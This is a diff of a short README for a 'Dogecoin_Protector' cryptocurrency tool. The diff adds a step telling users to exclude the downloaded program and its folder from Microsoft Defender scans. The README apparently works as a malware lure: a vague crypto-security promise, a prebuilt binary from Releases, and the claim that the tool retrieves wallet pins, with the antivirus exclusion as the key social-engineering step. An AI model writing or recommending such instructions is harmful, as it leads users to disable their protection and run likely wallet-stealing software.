DavidDadd/Dogecoin_Protector/README.md

 This program is an essential addition to any cryptocurrency user's toolkit, from the novice enthusiast to the seasoned trader.
 It prioritizes user-friendliness and robust security protocols to ensure your digital currencies are handled with utmost care.

 # Usage
 Please download the application from the 'Releases' section of our repository.
 Place the application in a designated folder of your choice for easy access.
+Please add the folder and the program to Exclusions of Microsoft Defender anti-virus scans.
 Once situated, you may proceed to run the application.

 **Get Started**:
 Activating and utilizing the tool is a straightforward process.
 Simply follow the on-screen instructions upon launch to securely generate or retrieve your wallet pin.